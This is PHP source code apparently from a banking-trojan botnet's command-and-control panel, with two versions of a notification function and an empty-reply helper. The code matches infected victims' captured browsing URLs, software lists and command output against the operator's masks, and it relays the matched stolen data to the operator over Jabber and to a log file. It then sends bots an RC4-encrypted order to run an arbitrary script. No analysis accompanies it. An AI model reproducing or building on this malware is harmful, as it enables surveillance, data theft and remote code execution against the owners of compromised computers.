function imNotify(&$type, &$list, &$botId, $defloration = false, $wentOnline = false) { if (empty($GLOBALS['config']['reports_jn_to'])) { return; } $messages = array(); # Notify of new matching BotIDs if ($defloration) { $ml = explode("", $GLOBALS['config']['reports_jn_botmasks']); foreach ($ml as $mask) { if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $botId) > 0) { $messages[] = "Reason: botId matched\nBot ID: {$botId}\n"; break; } } } # Notify of matching BotIDs went online if ($wentOnline) { $ml = explode("", $GLOBALS['config']['reports_jn_masks']['wentOnline']); foreach ($ml as $mask) { if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $botId) > 0) { $messages[] = "Reason: botId is online\nBot ID: {$botId}\n"; break; } } } # Notify of matching report URLs if (($type == BLT_HTTP_REQUEST || $type == BLT_HTTPS_REQUEST) && !empty($list[SBCID_PATH_SOURCE])) { $ml = explode("", $GLOBALS['config']['reports_jn_list']); foreach ($ml as $mask) { if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $list[SBCID_PATH_SOURCE]) > 0) { $messages[] = "Reason: URL matched\nBot ID: {$botId}\nURL: " . $list[SBCID_PATH_SOURCE] . "\n\n" . substr($list[SBCID_BOTLOG], 0, 1024); break; } } } # Notify of matching report contexts by type # NOTE: these reports are not presented in full! Only some lines around the keyword if (!empty($list[SBCID_BOTLOG])) { $report_match = array(BLT_ANALYTICS_SOFTWARE => array('software', 'Software matched'), BLT_COMMANDLINE_RESULT => array('cmd', 'Command line result matched')); foreach ($report_match as $rm_type => $rm) { if ($type == $rm_type) { $ml = explode("", $GLOBALS['config']['reports_jn_masks'][$rm[0]]); $reason = $rm[1]; foreach (array_filter(array_map('trim', $ml), 'strlen') as $mask) { if (@preg_match('#' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '#i', $list[SBCID_BOTLOG], $m, PREG_OFFSET_CAPTURE) > 0) { # Extract a few lines around the match $surrounding_lines = 2; $match_pos = $m[0][1]; # offset of the match $n_pos = array(0); # array of \n offsets $p = 0; # current offset $p_past_npos = false; # are we past the match? while (FALSE !== ($p = strpos($list[SBCID_BOTLOG], "\n", $p))) { # all \n-s $n_pos[] = $p; # add it if ($p > $match_pos) { $p_past_npos = true; } if (!$p_past_npos && count($n_pos) > $surrounding_lines + 1) { # don't keep more than N \n-s array_shift($n_pos); } if ($p_past_npos && count($n_pos) >= ($surrounding_lines + 1) * 2) { # stop a few lines past the match break; } $p++; } $p_from = array_shift($n_pos); $p_till = array_pop($n_pos); $message_part = trim(substr($list[SBCID_BOTLOG], $p_from, $p_till - $p_from)); $messages[] = "Reason: {$reason}\nBot ID: {$botId}\n\n" . $message_part; break; } } } } } # Notify if (empty($messages)) { return; } foreach ($messages as $message) { GateLog::get()->log(GateLog::L_TRACE, 'Jabber', sprintf("Notify %s : %s", $GLOBALS['config']['reports_jn_to'], $message)); } jabber_notify($GLOBALS['config']['reports_jn_to'], $messages); # Execute scripts, if set global $country_allowed; if ($country_allowed && strlen($GLOBALS['config']['reports_jn_script']) > 0) { $eid = md5(microtime(), true); $script = 'user_execute "' . trim($GLOBALS['config']['reports_jn_script']) . '" -f'; $size = strlen($eid) + strlen($script); $replyData = pack('LLLL', 1, 0, $size, $size) . $eid . $script; $replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + strlen($replyData), 0, 1) . md5($replyData, true) . $replyData; visualEncrypt($replyData); rc4($replyData, $GLOBALS['globalKey']); echo $replyData; die; } }
function imNotify(&$type, &$list, &$botId) { if (($type == BLT_HTTP_REQUEST || $type == BLT_HTTPS_REQUEST) && !empty($list[SBCID_PATH_SOURCE])) { $ml = explode("", $GLOBALS['config']['reports_jn_list']); foreach ($ml as &$mask) { if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $list[SBCID_PATH_SOURCE]) > 0) { $message = htmlentities("Bot ID: " . $botId . "\nURL: " . $list[SBCID_PATH_SOURCE] . "\n\n" . substr($list[SBCID_BOTLOG], 0, 1024)); error_reporting(0); if (strlen($GLOBALS['config']['reports_jn_logfile']) > 0 && ($fh = @fopen($GLOBALS['config']['reports_jn_logfile'], 'at')) !== false) { @fwrite($fh, $message . "\n\n" . str_repeat('=', 40) . "\n\n"); @fclose($fh); } require_once "system/jabberclass.php"; $jab = new Jabber(); $jab->server = $GLOBALS['config']['reports_jn_server']; $jab->port = $GLOBALS['config']['reports_jn_port']; $jab->username = $GLOBALS['config']['reports_jn_account']; $jab->password = $GLOBALS['config']['reports_jn_pass']; if ($jab->connect()) { $jab->sendAuth(); $jab->sendPresence(NULL, NULL, "online"); $jab->sendMessage($GLOBALS['config']['reports_jn_to'], "normal", NULL, array("body" => $message)); $jab->disconnect(); } if (strlen($GLOBALS['config']['reports_jn_script']) > 0) { $eid = md5($mask, true); $script = 'user_execute "' . trim($GLOBALS['config']['reports_jn_script']) . '" -f'; $size = strlen($eid) + strlen($script); $replyData = pack('LLLL', 1, 0, $size, $size) . $eid . $script; $replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + strlen($replyData), 0, 1) . md5($replyData, true) . $replyData; visualEncrypt($replyData); rc4($replyData, $GLOBALS['config']['botnet_cryptkey_bin']); echo $replyData; die; } break; } } } }
function sendEmptyReply() { $replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1) . "J�6�K��y�u.#H�"; visualEncrypt($replyData); rc4($replyData, $GLOBALS['config']['botnet_cryptkey_bin']); echo $replyData; die; }